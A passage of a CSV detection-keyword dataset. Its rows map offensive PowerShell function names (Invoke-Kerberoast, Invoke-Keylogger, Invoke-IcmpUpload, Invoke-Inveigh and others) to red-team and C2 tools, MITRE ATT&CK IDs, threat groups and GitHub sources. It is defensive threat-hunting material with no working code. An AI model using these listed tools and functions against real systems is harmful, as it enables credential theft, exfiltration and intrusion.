Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-Grouper2*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Grouper2*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-Grouper3*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Grouper3*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-HandleKatz*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-HandleKatz*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-Handlekatz*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-HardenedUNCPathCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-HijackableDllsCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-HijackableDllsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-HoneypotBuster*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,1,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z -*Invoke-HostEnum -*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/red-team-scripts,1,0,N/A,10,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z -*invoke-hostenum -*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-HostEnum*,offensive_tool_keyword,red-team-scripts,script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. it can also perform limited domain enumeration with the -Domain switch,T1016 - T1087.001 - T1049 - T1069,TA0007 - TA0003 - TA0006,N/A,N/A,Discovery,https://github.com/threatexpress/red-team-scripts,1,1,N/A,N/A,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z -*Invoke-HostRecon*,offensive_tool_keyword,HostRecon,Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. or other system commands to help avoid detection.,T1082 - T1087 - T1033,TA0001 - TA0007 - ,N/A,N/A,Information Gathering,https://github.com/dafthack/HostRecon,1,1,N/A,N/A,5,401,114,2017-10-03T13:25:06Z,2017-03-28T14:53:21Z -*invoke-hostscan*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-HotFixVulnCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-IcmpDownload*,offensive_tool_keyword,ICMP-TransferTools,Transfer files to and from a Windows host via ICMP in restricted network environments.,T1041 - T1001 - T1105 - T1205,TA0005 - TA0001 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/icyguider/ICMP-TransferTools,1,1,N/A,N/A,3,285,57,2022-01-27T16:53:44Z,2022-01-27T16:50:13Z -*Invoke-IcmpDownload.ps1*,offensive_tool_keyword,ICMP-TransferTools,Transfer files to and from a Windows host via ICMP in restricted network environments.,T1041 - T1001 - T1105 - T1205,TA0005 - TA0001 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/icyguider/ICMP-TransferTools,1,1,N/A,N/A,3,285,57,2022-01-27T16:53:44Z,2022-01-27T16:50:13Z -*Invoke-IcmpUpload.ps1*,offensive_tool_keyword,ICMP-TransferTools,Transfer files to and from a Windows host via ICMP in restricted network environments.,T1041 - T1001 - T1105 - T1205,TA0005 - TA0001 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/icyguider/ICMP-TransferTools,1,1,N/A,N/A,3,285,57,2022-01-27T16:53:44Z,2022-01-27T16:50:13Z -*Invoke-ImpersonateUser*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-InjectGEvent*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-InjectGEventAPI*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-InstalledProgramsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,0,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-InstalledServicesCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-InstalledServicesCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,0,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-Interceptor*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-Internalmonologue*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Internalmonologue*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-Inveigh*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1068,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Inveigh*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*Invoke-Inveigh*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-InveighRelay*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-InveighRelay.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1089,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-IR*,offensive_tool_keyword,Github Username,powershell forensic tools,N/A,N/A,N/A,N/A,Information Gathering,https://github.com/Invoke-IR,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Invoke-IronCyclone*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*Invoke-JSRatRegsvr*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-JSRatRundll*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-JuicyPotato*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*invoke-kerberoast *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*invokekerberoast*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Invoke-Kerberoast*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Invoke-Kerberoast*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Kerberoast*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Kerberoast*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*Invoke-Kerberoast.ps1*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*Invoke-Keylogger.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-KrbRelay*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-LapsCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z 